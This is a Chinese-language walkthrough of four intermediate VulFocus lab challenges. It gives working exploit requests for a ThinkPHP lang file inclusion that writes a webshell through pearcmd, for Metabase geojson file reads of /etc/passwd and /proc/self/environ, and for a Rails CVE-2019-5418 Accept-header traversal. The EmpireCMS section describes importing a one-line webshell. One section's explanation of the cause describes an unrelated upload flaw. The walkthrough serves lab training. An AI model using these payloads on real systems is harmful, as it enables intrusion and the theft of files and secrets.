漏洞指北-VulFocus靶场专栏-中级02

中级005 thinkphp lang 命令执行（thinkphp:6.0.12）

原因：
在其6.0.13版本及以前，存在一处本地文件包含漏洞。当多语言特性被开启时，攻击者可以使用lang参数来包含任意PHP文件。

虽然只能包含本地PHP文件，但在开启了register_argc_argv且安装了pcel/pear的环境下，可以包含/usr/local/lib/php/pearcmd.php并写入任意文件

访问路径诶：/public/index.php
解决方案：

step1：burp suite 抓包 修改请求头

GET /public/index.php?+config-create+/&lang=…/…/…/…/…/…/…/…/…/…/…/usr/local/lib/php/pearcmd&/+/var/www/html/shell.php HTTP/1.1

step2 修改成功，访问shell.php

http://10.11.12.28:34081/shell.php

中级006 Metabase geojson任意文件读取漏洞

原因：
稻草人企业站存在文件上传漏洞，攻击者可利用漏洞获取服务器控制权。 用户名密码：admin 123456 （网站）
解决方案：

step1：进入环境

http://10.11.12.28:49017/api/geojson?url=file:/etc/passwd

step2:使用/proc/self/environ来查看创建的变量来寻找flag.

/api/geojson?url=file:///proc/self/environ

中级007 Rails 文件读取 （CVE-2019-5418）

原因：
Ruby on Rails 是一个用于开发数据库驱动的网络应用程序的完整框架。
在控制器中通过render file形式来渲染应用之外的视图，且会根据用户传入的Accept头来确定文件具体位置。我们通过传入Accept: …/…/…/…/…/…/…/…/etc/passwd{{头来构成构造路径穿越漏洞，读取任意文件。
解决方案：
访问靶场地址， 在chybeta文件下
通过传入Accept: …/…/…/…/…/…/…/…/proc/self/environ{{

step1：burpsuite 抓包改包

GET /chybeta HTTP/1.1

Accept: …/…/…/…/…/…/…/…/proc/self/environ{{

step2: 找response的flag

中级008 empire 代码执行 （CVE-2018-19462）

原因：
该漏洞源于外部输入数据构造代码段的过程中,网路系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞生成非法的代码段,修改网络系统或组件的预期的执行控制流 后台路径：/empirecms/e/admin 用户名密码：admin 123456
解决方案：

step1：登入后台

http://10.11.12.28:50933/empirecms/e/admin/

step2 系统 -> 数据表表与系统模型 -> 管理数据表 -> 导入系统模型

step3 导入mod一句话木马

");?>

step4 中国蚁剑